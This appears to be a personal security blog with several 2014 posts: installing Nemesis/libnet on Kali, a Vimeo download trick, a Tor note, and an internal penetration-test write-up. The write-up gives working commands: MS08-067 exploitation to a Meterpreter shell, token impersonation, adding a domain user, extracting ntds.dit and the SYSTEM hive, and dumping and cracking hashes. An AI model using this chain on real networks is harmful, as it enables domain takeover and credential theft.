Wednesday, October 29, 2014

Kali-nemesis-libnet

Installation of Nemesis on Kali Linux

Nemesis -> http://nemesis.sourceforge.net/

Dependencies
apt-get install libdnet-dev
apt-get install libpcap-dev

Libnet -> wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz

tar zxvf libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a/
./configure 
make

To avoid an error during installation, edit the Makefile before running make install.
Complete the following path variable entry in the Makefile:

MAN_PREFIX  =   /usr/share/doc/

Otherwise make install stops with an error like:
./install-sh include/libnet/libnet-macros.h /usr/include/libnet
./install-sh include/libnet/libnet-asn1.h /usr/include/libnet
./install-sh include/libnet/libnet-ospf.h /usr/include/libnet
./install-sh doc/libnet.3
install:    no destination specified
make: *** [install] Error 1


Then run:

# make install
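An added helper, not part of the original post, that applies the Makefile fix described above before make install: it fills in MAN_PREFIX only when the assignment is empty and leaves an existing value alone. The Makefile path is passed as an argument and the default value /usr/share/doc/ is the one used in the post.

```shell
#!/bin/sh
# Added example: an empty MAN_PREFIX in the libnet-1.0.2a Makefile makes
# "make install" stop with "install: no destination specified".
# Usage: fix_man_prefix Makefile [prefix]   (prefix defaults to the post's value)

# Print the current MAN_PREFIX value with surrounding blanks removed
# (empty output if the variable is unset or the line is missing).
man_prefix_value() {
    sed -n 's/^MAN_PREFIX[[:space:]]*=//p' "$1" | head -n 1 \
        | sed 's/^[[:space:]]*//; s/[[:space:]]*$//'
}

# Fill in MAN_PREFIX when it is empty; never overwrite a value already set.
fix_man_prefix() {
    makefile="$1"
    prefix="${2:-/usr/share/doc/}"   # assumed default, taken from the post
    current=$(man_prefix_value "$makefile")
    if [ -n "$current" ]; then
        echo "MAN_PREFIX already set to $current"
        return 0
    fi
    if grep -q '^MAN_PREFIX[[:space:]]*=' "$makefile"; then
        # Rewrite the empty assignment; a temp file keeps this portable (no sed -i).
        sed "s|^MAN_PREFIX[[:space:]]*=.*|MAN_PREFIX = $prefix|" "$makefile" > "$makefile.tmp" \
            && mv "$makefile.tmp" "$makefile"
    else
        printf 'MAN_PREFIX = %s\n' "$prefix" >> "$makefile"
    fi
    echo "MAN_PREFIX set to $prefix in $makefile"
}
```

Run it against the generated Makefile after ./configure and before make install; the second run is a no-op.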

Friday, October 24, 2014

Enterprise-Security-A-Complete-Internal-Compromise

This post is about an internal vulnerability assessment and penetration test for an enterprise. Every time I do a similar project I think of writing a post about it for my own reference... At last, now is the time.
Enterprise:
Yes... More than 1500 users...
More than 100 servers...
Firewalls...
Routers...
Proxy...
VOIP...
Bio...
IT...
I...

My favourite fingerprinting command for a Windows environment:
nmap -p445 --script=smb-os-discovery xxx.xxx.x.x/xx

Ran a Nessus scan against the desktop IP range. Surprisingly, all of them showed up as good, except for RDP MiTM, SSL and SMB signing findings!

Continued the Nessus scan on the server ranges at headquarters: same result!

Continued the Nessus scan on the servers at the branch offices...

Except for one 2003 server, all the others showed the same!

There comes God's last fingerprint. What is that critical red colour? Yes, it is the very old, widely exploited and demonstrated bug of evergreen Microsoft: MS08-067!

No more explanation required here at all. Yes, there comes the first reverse Meterpreter shell!

meterpreter > use incognito
Loading extension incognito...success.

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
<DOMAIN_NAME REMOVED>\backupuser


meterpreter > impersonate_token DOMAIN\\backupuser
[-] No delegation token available
[+] Successfully impersonated user
DOMAIN\\backupuser
meterpreter > getuid
Server username:
DOMAIN\\backupuser
meterpreter > execute -f cmd.exe -i -t
Process 3712 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
DOMAIN\\backupuser

There comes a user from the domain. Next, I created a user on the domain.

C:\WINDOWS\system32>net user pentest password-not-now /add /domain
net user pentest password-not-now /add /domain
The request will be processed at a domain controller for domain DOMAIN.

Luckily, the backupuser account had the privilege to create a user on the ADC and add it to the Domain Admins group, etc.

Connected to the Primary Domain Controller with RDP!
At the command prompt:
C:\> ntdsutil
ntdsutil: snapshot
snapshot: activate instance NTDS
Active instance set to "NTDS".
snapshot: list all
No snapshots found.
snapshot: create
Creating snapshot...
Snapshot set {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} generated successfully.
snapshot: list all
1: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXxxxx
2: C:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
snapshot: mount 2
Snapshot {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} mounted as C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\

Downloaded the ntds.dit file from
C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\Windows\NTDS\

Created a copy of the SYSTEM hive from the registry:
reg.exe save HKLM\SYSTEM c:\pentest.system
Downloaded that file too.

Files downloaded from PDC
167M    ntds.dit
8.9M     pentest.system

Used secretsdump.py to extract usernames and hashes:
#secretsdump.py -system pentest.system -ntds ntds.dit LOCAL

The resulting file had more than 3000 lines!
The CrackStation password list was able to recover up to 50 passwords for half of the hashes, and 20% of the users were using the same password!
*** Cracking the hashes is not allowed in all organizations, so before cracking any passwords make sure this action is not prohibited by their policy. ***

Thursday, October 2, 2014

Vimeo-no-access-to-full-access

I came across a situation where I had a valid Vimeo video link, but Vimeo would not allow it to be viewed online!

The rest is explained below in pictures...

First, when I tried to access it in the browser, it did not work!

Then I pasted the link in http://www.videograbber.net/free-vimeo-downloader

I was easily able to download the video :D


**Contents hidden due to privacy issues ...

How did I get the links?

They were from a website: I just saved the page source and ran the following command on Linux to get the Vimeo links:

#grep vimeo vimeo.txt  | awk -F"src=" '{print $2}' | awk -F "\" frame" '{print $1}' | awk -F "\"" '{print $2}'

Tuesday, September 30, 2014

Kali-Tor-Blocked-Content-download

Just a snapshot of downloading blocked content [blocked by organization/ISP/government/country/etc.] on Kali using the Tor network.

